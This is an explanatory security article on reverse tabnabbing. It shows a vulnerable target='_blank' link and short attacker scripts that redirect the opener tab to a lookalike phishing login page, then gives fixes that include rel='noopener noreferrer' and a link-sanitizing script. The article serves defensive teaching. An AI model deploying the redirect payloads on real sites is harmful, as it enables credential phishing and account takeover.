Reverse Tabnabbing

Reverse tabnabbing is an attack in which a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. Here the redirection is triggered through links from the parent site to the attacker's site.

In tabnabbing, attackers take advantage of and gain control over the victim's unattended browser tabs, hijacking them and redirecting the victim to malicious URLs where they can carry out a phishing attack and execute scripts.

The attacker redirects the page the victim came from, which sits in a different tab, to a phishing page, and the victim later navigates back to that tab. The victim believes they are still on the right page but has in reality landed on the attacker's page. If the victim authenticates to this phishing page, the credentials (or other sensitive data) are sent to the phishing site rather than to the legitimate one.

How does a reverse tabnabbing attack work:

Websites may contain links to other websites, and such links are sometimes opened in a new tab. If we add target="_blank" to an <a> element in HTML, the link opens in a new tab. The page we link to through href might be either safe or unsafe, and since we have no control over it we do not really know whether the href points to a legitimate page or a malicious one.

<a href="https://page.site.com" target="_blank">

If a linked page is opened with target="_blank" or with window.open() in JavaScript, the linked page gets a reference to the linking page through its own window.opener property. The linked page can therefore set window.opener.location to any domain it wants.

Let us check the following code snippet which contains an unsafe target blank implementation:

Vulnerable page:

<!DOCTYPE HTML>
<html>
  <head>
    <title>Reverse Tabnabbing</title>
  </head>
  <body>
    <!-- target="_blank" without rel="noopener": the opened page can reach window.opener -->
    <a href="https://evil.sample.com" target="_blank">Click me</a>
  </body>
</html>

Malicious Site Code:

<!DOCTYPE HTML>
<html>
  <body>
    <script>
      // window.opener is only set when this tab was opened by another page
      if (window.opener) {
        window.opener.location = "https://phish.sample.com";
      }
    </script>
  </body>
</html>

Now, when the victim clicks the link on the vulnerable page, the malicious site opens in a new tab, and the original website in the now-inactive tab is replaced by the phishing website.

The following <a href="https://sample.com/" target="_blank">link</a> is vulnerable to reverse tabnabbing because it uses target="_blank".

This means the page that opens in a new tab can access the initial tab and change its location using the window.opener property.

Let's look at this attack in a real-world scenario:

The victim has opened a social networking website called funchat.com in a browser window. He has logged into the site and sees that someone has posted about an offer on his wall:

A great deal with 30% offer on branded Smartwatches!!

The victim carelessly clicks the link, which opens eshop.com with the offer in a new tab. eshop.com is a malicious website controlled by the attacker.

The attacker has written the code for his website roughly like this:

<!DOCTYPE HTML>
<html>
  <body>
    <script>
      if (window.opener) {
        window.opener.location = "https://funnchat.com/login.php";
      }
    </script>
    <h1>AMAZING DEAL ON SMARTWATCHES!!</h1>
    . . .
  </body>
</html>

While the victim is browsing the fake offers on the malicious website, the malicious site forces the victim's original funchat tab to redirect to the fake website (funnchat.com), which is controlled by the attacker and looks exactly like funchat's login page.

The fake website's login page appears and asks the victim to re-enter their login credentials. Being prompted for login credentials happens from time to time, so the victim does not think much of it and enters the username and password.

Voilà. The attacker has stolen the victim’s login credentials.

Impact:

This attack makes it quite likely that even an attentive user is lured into revealing confidential information. The user does not suspect that their credentials have been stolen, believing only that they entered their password incorrectly on the fake login page. The attacker can steal the victim's login credentials and take over the victim's account.

Solutions:

The following fixes can be used to prevent this attack.

  1. Add rel="noopener noreferrer" to every <a> element that has target set to "_blank". noopener ensures that the linked page does not get access to the linking page's window through window.opener. noreferrer makes sure that the Referer request header is not sent, so the destination site will not see the URL the user came from.

HTML code:

<a href="https://evil.sample.com" rel="noopener noreferrer" target="_blank">click here</a>

  2. If JavaScript is being used to open the window, the same can be achieved by passing the noopener feature to window.open() and setting the opener property to null.

var myNewWindow = window.open(url, name, 'noopener,noreferrer');
// With 'noopener' in the features string, window.open() returns null in modern
// browsers, so guard before clearing opener for browsers that ignore the feature.
if (myNewWindow) myNewWindow.opener = null;

If user-generated content is shown on the page, sanitize the input and apply rel="noopener noreferrer" to every link.
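One way to apply that last fix to user-posted content, as an added example that is not part of the original post: a small rewriter that adds the required rel tokens to every anchor with target="_blank", merging with any rel value already present. The sample HTML is constructed; a regex pass like this complements, and does not replace, a real HTML sanitizer.

```javascript
// Enforce rel="noopener noreferrer" on every <a ... target="_blank"> in an HTML
// string so pages opened from user content cannot reach window.opener.
const REQUIRED_REL = ["noopener", "noreferrer"];

// Parse the attribute text of one <a ...> tag into { name: value } (names lowercased).
// Handles double-quoted, single-quoted, unquoted and boolean (valueless) attributes.
function parseAttrs(attrText) {
  const attrs = {};
  const re = /([^\s=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// Rebuild one opening <a> tag; only tags with target="_blank" are changed.
function hardenAnchor(attrText) {
  const attrs = parseAttrs(attrText);
  if ((attrs.target || "").toLowerCase() !== "_blank") {
    return "<a" + attrText + ">"; // same-tab link: leave untouched
  }
  // Merge existing rel tokens (e.g. nofollow) with the two we require.
  const rel = new Set((attrs.rel || "").split(/\s+/).filter(Boolean));
  REQUIRED_REL.forEach((token) => rel.add(token));
  attrs.rel = [...rel].join(" ");
  const rebuilt = Object.entries(attrs)
    .map(([k, v]) => `${k}="${v.replace(/"/g, "&quot;")}"`)
    .join(" ");
  return "<a " + rebuilt + ">";
}

// Rewrite every opening <a ...> tag (attribute values containing ">" are not handled).
function enforceNoopener(html) {
  return html.replace(/<a(\s[^>]*)?>/gi, (_, attrText) => hardenAnchor(attrText || ""));
}

// Constructed sample of a user post, in the spirit of the funchat scenario above.
const SAMPLE_POST =
  '<p>Deal! <a href="https://eshop.example" target="_blank">30% off</a> and ' +
  '<a href="/profile" rel="nofollow" target=_blank>me</a> <a href="/home">home</a></p>';

console.log(enforceNoopener(SAMPLE_POST));
```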

The post Reverse Tabnabbing appeared first on Security Intelligence.

Author: NewsCred System